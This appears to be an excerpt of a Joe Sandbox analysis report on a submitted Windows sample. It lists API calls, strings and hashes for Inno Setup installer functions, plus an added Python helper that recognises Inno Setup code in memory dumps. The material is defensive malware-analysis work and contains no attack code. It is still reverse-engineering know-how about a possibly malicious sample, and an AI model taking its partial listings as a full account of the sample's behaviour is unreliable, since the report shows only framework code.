                                                                                • Instruction ID: 55aff4e3ab0814f5b97a0c0db1ec4da333d3f7c11773d115dc143ade784a7ab4
                                                                                • Opcode Fuzzy Hash: 333668ea2a957bd6a9fe502da343e78d2fcb082c63b96445e07994a194d2f0c0
                                                                                • Instruction Fuzzy Hash: BAD05E7120010C7B9B00DE9CE840C6B33BC9B88700BA08825F918C7202C634ED5187A8

                                                                                 Control-flow Graph

                                                                                 • Function 46f300-46f99d (rendered graph omitted; node legend: Executed / Not Executed)
                                                                                APIs
                                                                                  • Part of subcall function 0046F0EC: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,004763FA,?,0049C1D0,?,0046F403,?,00000000,0046F99E,?,_is1), ref: 0046F10F
                                                                                  • Part of subcall function 0046F15C: RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F7DA,?,?,00000000,0046F99E,?,_is1,?), ref: 0046F16F
                                                                                • RegCloseKey.ADVAPI32(?,0046F9A5,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046F9F0,?,?,0049C1D0,00000000), ref: 0046F998
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Value$Close
                                                                                • String ID: " /SILENT$5.5.0 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$EstimatedSize$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: Language$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
                                                                                • API String ID: 3391052094-1769338133
                                                                                • Opcode ID: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                • Instruction ID: 138fe2a8aa43a8f2517aa1aee13eacc10811dc4b0cf032f1bf39601b5d09dcc5
                                                                                • Opcode Fuzzy Hash: 67f6315d958a58f45cb4284f97db66795a1d98a02650a50bcbb58ac39832d899
                                                                                • Instruction Fuzzy Hash: 96126331A001089BCB04EB55F891ADE77F5FB49304F60807BE841AB396EB79BD49CB59

                                                                                 Control-flow Graph

                                                                                 • Function 492208-4926fc (rendered graph omitted; node legend: Executed / Not Executed)
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000000,004926FD,?,?,?,?,00000000,00000000,00000000), ref: 00492248
                                                                                • FindWindowA.USER32(00000000,00000000), ref: 00492279
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FindSleepWindow
                                                                                • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                • API String ID: 3078808852-3310373309
                                                                                • Opcode ID: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                                • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                • Opcode Fuzzy Hash: c1ec15085ba63eb54c7011cdac0519612329d97296155b19e28ce0d5a23e6700
                                                                                • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359

                                                                                 Control-flow Graph

                                                                                 • Function 4834fc-4835d2 (rendered graph omitted; node legend: Executed / Not Executed)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                • API String ID: 2230631259-2623177817
                                                                                • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E

                                                                                 Control-flow Graph: entry block 004690F4 (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                Strings
                                                                                • Inno Setup: Setup Type, xrefs: 00469206
                                                                                • Inno Setup: No Icons, xrefs: 004691DF
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                • %s\%s_is1, xrefs: 00469171
                                                                                • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                • Inno Setup: Selected Components, xrefs: 00469216
                                                                                • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                • Inno Setup: App Path, xrefs: 004691B6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1093091907
                                                                                • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59

                                                                                 Control-flow Graph: entry block 0047CB30 (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(70020000,SHGetFolderPathA), ref: 0047CC32
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                • API String ID: 190572456-1821436788
                                                                                • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D

                                                                                 Control-flow Graph: entry block 00406334 (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModulePolicyProcess
                                                                                • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                • API String ID: 3256987805-3653653586
                                                                                • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD
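The three functions above (the one writing `Software\Microsoft\Windows\CurrentVersion\Uninstall\%s_is1` with the `Inno Setup: ...` value names, the `_isetup\_shfoldr.dll` / `SHGetFolderPathA` loader, and the stub that resolves `SetDllDirectoryW`, `SetSearchPathMode` and `SetProcessDEPPolicy` through `GetProcAddress`) are stock Inno Setup installer code, so their API activity describes the installer wrapper rather than whatever it installs. The triage helper below is an added example, not part of the Joe Sandbox report or of the sample: it matches the marker strings taken from the String ID fields above against a dump and expands the `%s\%s_is1` template into the registry key an incident responder would read for `Inno Setup: App Path`. The dump bytes and the AppId are constructed for the example; nothing here is derived from the sample beyond the strings listed in the report.

```python
"""Triage helper: recognise Inno Setup framework code from dump strings.

Added example, not code from the Joe Sandbox report or from the sample.
Marker strings are the ones listed in the report's String ID fields;
SAMPLE_DUMP and the AppId passed to uninstall_key() are constructed.
"""

# Marker groups, one per function in the report. The first two groups are
# unique to Inno Setup; the third is weaker evidence on its own (any hardened
# binary may resolve these three APIs), so a verdict requires two groups.
INNO_MARKERS = {
    "uninstall-registry": (
        b"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall",
        b"%s\\%s_is1",
        b"Inno Setup: App Path",
        b"Inno Setup: Setup Type",
        b"Inno Setup: Selected Tasks",
    ),
    "shfolder-loader": (
        b"_isetup\\_shfoldr.dll",
        b"Failed to get version numbers of _shfoldr.dll",
        b"SHGetFolderPathA",
    ),
    "process-hardening": (
        b"SetProcessDEPPolicy",
        b"SetDllDirectoryW",
        b"SetSearchPathMode",
    ),
}


def classify_dump(blob: bytes) -> dict:
    """Return {group: [markers found]} for every marker group present in blob."""
    found = {}
    for group, markers in INNO_MARKERS.items():
        hits = [m.decode() for m in markers if m in blob]
        if hits:
            found[group] = hits
    return found


def is_inno_setup_stub(blob: bytes, min_groups: int = 2) -> bool:
    """True when at least min_groups independent marker groups are present.

    One group alone (for example only the DEP/DLL-search API names) is not
    enough to call the code an Inno Setup stub.
    """
    return len(classify_dump(blob)) >= min_groups


def uninstall_key(app_id: str, per_machine: bool = True) -> str:
    """Expand the report's "%s\\%s_is1" template into a full registry path.

    app_id is the installer's [Setup] AppId, which the report does not show;
    the caller supplies it. The resulting key holds "Inno Setup: App Path",
    i.e. the directory the installer unpacked into.
    """
    hive = "HKLM" if per_machine else "HKCU"
    base = r"Software\Microsoft\Windows\CurrentVersion\Uninstall"
    return f"{hive}\\{base}\\{app_id}_is1"


# Constructed sample: fake dump bytes carrying markers from all three groups,
# interleaved with unrelated filler.
SAMPLE_DUMP = (
    b"\x00\x90\x90"
    + b"Inno Setup: App Path\x00"
    + b"%s\\%s_is1\x00"
    + b"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\x00"
    + b"\xcc\xcc"
    + b"_isetup\\_shfoldr.dll\x00SHGetFolderPathA\x00"
    + b"\xff\xff"
    + b"SetProcessDEPPolicy\x00kernel32.dll\x00"
)

if __name__ == "__main__":
    for group, hits in classify_dump(SAMPLE_DUMP).items():
        print(f"{group}: {', '.join(hits)}")
    print("Inno Setup stub:", is_inno_setup_stub(SAMPLE_DUMP))
    print(uninstall_key("{EXAMPLE-APPID}"))  # AppId is a placeholder
```

Run it against the `.sdmp` files listed under Memory Dump Source to decide quickly which analysed functions belong to the installer and can be set aside; on an infected host the key returned by `uninstall_key()` is where to look for the install directory.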

                                                                                 Control-flow Graph: entry block 00423884 (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                  • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                                • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                • String ID:
                                                                                • API String ID: 183575631-0
                                                                                • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                                                • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D

                                                                                 Control-flow Graph: entry block 004674EC (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                  • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                                  • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                                • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                                • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                • String ID: c:\directory$k H$shell32.dll
                                                                                • API String ID: 3376378930-433663191
                                                                                • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                                                • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59

                                                                                 Control-flow Graph: entry block 0042F570 (rendered as an image in the original report; the block-level graph is not reproduced here)
                                                                                APIs
                                                                                • GetActiveWindow.USER32 ref: 0042F59F
                                                                                • GetFocus.USER32 ref: 0042F5A7
                                                                                • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                                • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                                • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                                • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                • String ID: TWindowDisabler-Window
                                                                                • API String ID: 3167913817-1824977358
                                                                                • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                                • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                • API String ID: 1646373207-2130885113
                                                                                • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                                • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                                APIs
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDirectoryErrorLast
                                                                                • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                                • API String ID: 1375471231-1421604804
                                                                                • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                                • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                                • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                                APIs
                                                                                • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                                • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                                • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                                • API String ID: 4130936913-2943970505
                                                                                • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                                • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                                • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
